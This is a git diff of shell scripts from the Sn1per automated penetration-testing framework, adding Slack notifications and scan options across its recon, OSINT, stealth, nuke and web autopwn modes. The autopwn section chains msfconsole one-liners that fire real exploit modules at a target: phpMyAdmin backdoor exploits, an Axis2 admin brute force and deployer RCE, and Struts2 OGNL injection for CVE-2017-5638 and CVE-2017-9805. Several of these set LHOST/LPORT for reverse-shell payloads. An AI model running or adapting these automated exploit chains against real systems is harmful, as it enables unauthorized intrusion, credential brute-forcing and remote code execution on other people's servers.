python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --ssl --port 443 | tee $LOOT_DIR/web/shocker-$TARGET-port443.txt
fi
if [ "$JEXBOSS" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd /tmp/
python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port443.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port443.raw > $LOOT_DIR/web/jexboss-$TARGET-port443.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port443.raw 2> /dev/null
cd $INSTALL_DIR
fi
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished web mode scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
cd $INSTALL_DIR
if [ "$METASPLOIT_EXPLOIT" == "1" ]; then
PORT="443"
SSL="true"
source modes/web_autopwn.sh
fi
fi

View File

@ -9,7 +9,7 @@ if [ "$MODE" = "nuke" ]; then
for a in `cat $FILE`;
do
if [ ! -z "$WORKSPACE" ]; then
args="$args -b -re -o -fp -w $WORKSPACE"
args="$args -b -fp -w $WORKSPACE"
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*] Saving loot to $WORKSPACE_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $WORKSPACE_DIR 2> /dev/null
@ -40,11 +40,18 @@ if [ "$MODE" = "nuke" ]; then
echo -e "$OKORANGE + -- --=[WARNING! Nuking ALL target! $RESET"
echo -e "$RESET"
if [ ! -z "$WORKSPACE_DIR" ]; then
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
else
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
fi
args=""
done
@ -52,5 +59,8 @@ if [ "$MODE" = "nuke" ]; then
if [ "$LOOT" = "1" ]; then
loot
fi
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
exit
fi

View File

@ -1,4 +1,7 @@
if [ "$OSINT" = "1" ]; then
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running OSINT: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -23,4 +26,7 @@ if [ "$OSINT" = "1" ]; then
fi
metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null
fi
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished OSINT: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
fi

View File

@ -4,6 +4,9 @@
echo -e "$OKRED SKIPPING OSINT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
else
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running stage 2 OSINT check: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
if [ $GOOHAK = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING GOOGLE HACKING QUERIES $RESET"
@ -20,5 +23,8 @@
rm -Rf output/ cookie.txt exploits.conf
fi
GHDB="1"
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished stage 2 OSINT check: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
fi
fi

View File

@ -1,4 +1,7 @@
if [ "$RECON" = "1" ]; then
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running recon scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBLIST3R $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -40,27 +43,12 @@ if [ "$RECON" = "1" ]; then
echo ""
echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
fi
if [ "$CENSYS_SUBDOMAINS" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING CENSYS SUBDOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/censys-subdomain-finder/censys_subdomain_finder.py --censys-api-id $CENSYS_APP_ID --censys-api-secret $CENSYS_API_SECRET $TARGET | egrep "\-" | awk '{print $2}' | tee $LOOT_DIR/domains/domains-$TARGET-censys.txt 2> /dev/null
fi
if [ "$PROJECT_SONAR" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING PROJECT SONAR SUBDOMAINS $RESET"
@ -92,11 +80,15 @@ if [ "$RECON" = "1" ]; then
for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done;
fi
if [ "$SUBOVER" = "1" ]; then
cd ~/go/src/github.com/Ice3man543/SubOver
subover -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/subover-$TARGET 2>/dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/subover-$TARGET > $LOOT_DIR/nmap/subover-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/takeovers-$TARGET-subover 2> /dev/null
cd $INSTALL_DIR
fi
if [ "$SUBJACK" = "1" ]; then
~/go/bin/subjack -w $LOOT_DIR/domains/domains-$TARGET-full.txt -t 10 -o $LOOT_DIR/nmap/subjack-$TARGET.txt -a -v
fi
if [ "$SLURP" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED STARTING PUBLIC S3 BUCKET SCAN $RESET"
@ -104,4 +96,13 @@ if [ "$RECON" = "1" ]; then
cd $PLUGINS_DIR/slurp/
./slurp-linux-amd64 domain --domain $TARGET | tee $LOOT_DIR/nmap/takeovers-$TARGET-s3-buckets.txt 2>/dev/null
fi
if [ "$SUBNET_RETRIEVAL" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED STARTING SUBNET RETRIEVAL $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -s -L --data "ip=$TARGET" https://2ip.me/en/services/information-service/provider-ip\?a\=act | grep -o -E '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/[0-9]{1,2}' | tee $LOOT_DIR/nmap/subnets-$TARGET.txt
fi
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished recon scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
fi

View File

@ -28,8 +28,12 @@ if [ "$MODE" = "stealth" ]; then
mkdir $LOOT_DIR/output 2> /dev/null
fi
args="$args --noreport -m stealth"
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
echo -e "$OKRED ____ $RESET"
@ -39,8 +43,8 @@ if [ "$MODE" = "stealth" ]; then
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://xerosecurity.com"
echo -e "$OKORANGE + -- --=[Sn1per v$VER by 1N3"
echo -e "$OKORANGE + -- --=[https://xerosecurity.com"
echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz"
echo -e "$OKRED "
echo -e "$OKRED ./\."
echo -e "$OKRED ./ '\."
@ -85,7 +89,7 @@ if [ "$MODE" = "stealth" ]; then
fi
dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
dig A $TARGET 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
host $TARGET 2> /dev/null | grep address 2> /dev/null | awk '{print $4}' 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
dnsenum $TARGET 2> /dev/null | tee $LOOT_DIR/output/dnsenum-$TARGET.txt 2> /dev/null
mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
@ -154,6 +158,7 @@ if [ "$MODE" = "stealth" ]; then
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 --max-time 5 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 -s -R -L http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS http://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port80.txt 2> /dev/null
if [ "$WEBTECH" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
@ -204,28 +209,40 @@ if [ "$MODE" = "stealth" ]; then
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
if [ "$WEB_BRUTE" == "1" ]; then
if [ "$WEB_BRUTE_STEALTHSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm $RESET"
fi
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u http://$TARGET -w $WEB_BRUTE_STEALTH -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-stealth.txt
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
else
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null$RESET"
if [ $CUTYCAPT = "1" ]; then
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
else
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null$RESET"
fi
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
fi
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
fi
if [ $WEBSCREENSHOT = "1" ]; then
cd $LOOT_DIR
python $INSTALL_DIR/bin/webscreenshot.py -t 5 http://$TARGET:80
fi
fi
@ -265,6 +282,7 @@ if [ "$MODE" = "stealth" ]; then
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 --max-time 5 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 -s -R -L https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS https://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port443.txt 2> /dev/null
if [ "$WEBTECH" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
@ -292,9 +310,8 @@ if [ "$MODE" = "stealth" ]; then
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null$RESET"
fi
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
fi
if [ "$BLACKWIDOW" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
@ -303,7 +320,9 @@ if [ "$MODE" = "stealth" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN blackwidow -u https://$TARGET:443 -l 3$RESET"
fi
blackwidow -u https://$TARGET:443 -l 2 -v n
cat /usr/share/blackwidow/$TARGET*/* >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
if [ $WEB_BRUTE_STEALTHSCAN == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -312,9 +331,15 @@ if [ "$MODE" = "stealth" ]; then
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm $RESET"
fi
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u https://$TARGET -w $WEB_BRUTE_STEALTH -e | tee $LOOT_DIR/web/webbrute-$TARGET-https-stealth.txt
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null$RESET"
fi
@ -334,13 +359,20 @@ if [ "$MODE" = "stealth" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
else
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null$RESET"
if [ $CUTYCAPT = "1" ]; then
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
else
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null$RESET"
fi
cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
fi
cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
fi
if [ $WEBSCREENSHOT = "1" ]; then
cd $LOOT_DIR
python $INSTALL_DIR/bin/webscreenshot.py -t 5 https://$TARGET:443
fi
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg"
fi
@ -368,5 +400,8 @@ if [ "$MODE" = "stealth" ]; then
if [ "$LOOT" = "1" ]; then
loot
fi
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
exit
fi

View File

@ -14,8 +14,12 @@ if [ "$MODE" = "web" ]; then
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
fi
fi

View File

@ -1,3 +1,6 @@
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running web autopwn: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -37,7 +40,7 @@
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JENKINS ENUMERATION $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/jenkins_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set TARGETURI /; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw
msfconsole -q -x "use scanner/http/jenkins_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set TARGETURI /; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -100,6 +103,40 @@
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING AXIS2 ADMIN BRUTE FORCE SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/axis_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg USERNAME admin; setg PASS_FILE "$PASS_FILE"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING AXIS2 AUTHENTICATED DEPLOYER RCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use multi/http/axis2_deployer; setg RHOSTS "$TARGET"; set FingerprintCheck false; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@ -121,19 +158,19 @@
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
